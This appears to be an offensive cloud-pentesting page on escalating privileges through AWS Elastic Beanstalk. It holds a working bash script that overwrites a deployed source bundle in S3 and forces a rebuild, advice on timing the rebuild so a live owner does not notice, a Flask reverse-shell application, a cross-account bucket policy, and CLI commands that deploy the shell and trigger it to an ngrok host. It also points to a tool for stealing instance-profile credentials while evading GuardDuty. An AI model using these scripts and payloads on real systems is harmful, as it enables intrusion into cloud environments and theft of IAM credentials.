To perform sensitive actions in Beanstalk you need a number of sensitive permissions across several different services. As a reference for what "full" access looks like, check the permissions granted by arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk
elasticbeanstalk:RebuildEnvironment, S3 write permissions & many others
With write permissions over the S3 bucket that holds the environment's code, plus permission to rebuild the environment (elasticbeanstalk:RebuildEnvironment and a few related S3, EC2 and CloudFormation permissions are required), you can overwrite the source bundle, rebuild the environment, and the next time the application is started it will run your code. That lets an attacker compromise the application and steal the credentials of the IAM role attached to its instance profile.
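The same-account path described above, written out as an added example (this script is not part of the original page). It assumes an application called MyApp running in an environment called MyEnv, and that the attacker's Flask bundle already sits in ./revshell/application.py and ./revshell/requirements.txt; the describe-application-versions query reads the bucket and key of the currently deployed bundle so that the overwrite lands exactly where the rebuilt instances will look:

```bash
#!/usr/bin/env bash
# Added example: overwrite the deployed source bundle in place and force a rebuild.
# Assumes the caller holds s3:PutObject on the Beanstalk bucket and
# elasticbeanstalk:RebuildEnvironment (plus the EC2/CloudFormation rights the text mentions).
set -eu

APP_NAME="${APP_NAME:-MyApp}"   # assumed names, override via environment
ENV_NAME="${ENV_NAME:-MyEnv}"

# Build the zip Beanstalk expects: application.py and requirements.txt at the top level.
build_bundle() {                # build_bundle <out.zip> <srcdir>
    local out
    out="$(cd "$(dirname "$1")" && pwd)/$(basename "$1")"
    if command -v zip >/dev/null 2>&1; then
        (cd "$2" && zip -q "$out" application.py requirements.txt)
    else
        (cd "$2" && python3 -m zipfile -c "$out" application.py requirements.txt)
    fi
}

# Print "<bucket> <key>" of the bundle behind the version currently deployed in ENV_NAME.
current_bundle_location() {
    local version
    version=$(aws elasticbeanstalk describe-environments \
        --environment-names "$ENV_NAME" \
        --query 'Environments[0].VersionLabel' --output text)
    aws elasticbeanstalk describe-application-versions \
        --application-name "$APP_NAME" --version-labels "$version" \
        --query 'ApplicationVersions[0].SourceBundle.[S3Bucket,S3Key]' --output text
}

overwrite_and_rebuild() {       # overwrite_and_rebuild <bundle.zip>
    local bundle="$1" loc bucket key
    loc=$(current_bundle_location)
    set -- $loc
    bucket="$1"; key="$2"
    # Same key, new bytes: no new application version is created, so
    # CreateApplicationVersion / UpdateEnvironment rights are not needed.
    aws s3 cp "$bundle" "s3://$bucket/$key"
    # Rebuild tears the instances down; the replacements download the modified bundle.
    aws elasticbeanstalk rebuild-environment --environment-name "$ENV_NAME"
}

if [ "${1:-}" = "run" ]; then
    build_bundle revshell.zip revshell
    overwrite_and_rebuild revshell.zip
fi
```

Run it as `./overwrite.sh run`. Rebuilding replaces every instance in the environment (downtime the owner will notice), so on a live target prefer a moment when a deployment is expected anyway.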
elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, and others...
The permissions above, together with several S3, EC2, CloudFormation, autoscaling and elasticloadbalancing permissions, are needed to build a basic Elastic Beanstalk scenario from scratch.
First of all, following the previous steps, you need to create a legitimate Beanstalk environment in your own account with the code you want to run in the victim. It can be a simple zip containing these 2 files (the Flask application below, plus a requirements.txt declaring Flask as a dependency so the platform installs it):
```python
from flask import Flask, request, jsonify
import subprocess, os, socket

application = Flask(__name__)


@application.errorhandler(404)
def page_not_found(e):
    return jsonify('404')


@application.route("/")
def index():
    return jsonify('Welcome!')


# Reverse shell trigger: /get_shell?host=<attacker>&port=<port>
@application.route("/get_shell")
def search():
    host = request.args.get('host')
    port = request.args.get('port')
    if host and port:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        # Redirect stdin/stdout/stderr of this worker to the socket, then spawn a shell on it
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
    return jsonify('done')


if __name__ == "__main__":
    application.run()
```
Once you have your own Beanstalk environment running the rev shell, it's time to migrate it to the victim's environment. To do so you need to update the Bucket Policy of your Beanstalk S3 bucket so the victim can access it (note that this will open the bucket to EVERYONE):
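An added example of such a bucket policy (it is not the page's own policy). The page's approach uses `"Principal": "*"`; the version below instead restricts the principal to the victim's account, which is enough for cross-account reads because the victim-side IAM policy (the Beanstalk instance profile's managed policies grant s3:Get* on `elasticbeanstalk-*` buckets) must also allow the call. The bucket name, object key and the `<region>`, `<accId>` and `<victimAccId>` placeholders are assumptions; that the account-scoped principal is sufficient for every Beanstalk platform is also an assumption, so fall back to the broader policy the text describes if the environment fails to fetch the bundle:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowVictimAccountToFetchBundle",
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::<victimAccId>:root" },
      "Action": ["s3:GetObject", "s3:GetObjectVersion"],
      "Resource": "arn:aws:s3:::elasticbeanstalk-<region>-<accId>/revshell.zip"
    },
    {
      "Sid": "AllowVictimAccountToListBucket",
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::<victimAccId>:root" },
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::elasticbeanstalk-<region>-<accId>"
    }
  ]
}
```

Apply it with `aws s3api put-bucket-policy --bucket elasticbeanstalk-<region>-<accId> --policy file://policy.json`. If S3 Block Public Access is enabled on the bucket, a policy with `"Principal": "*"` is rejected at put time (BlockPublicPolicy), which is another reason to scope the principal to the one account that needs it.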
```bash
# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# This step needs the extra permissions (deploys the version created above)
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-2.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
```

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., a [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution: GuardDuty alerts when instance profile credentials are used outside the EC2 instance).

The developer intends to establish a reverse shell using Netcat or Socat, with the next steps kept contained to the EC2 instance to avoid detections.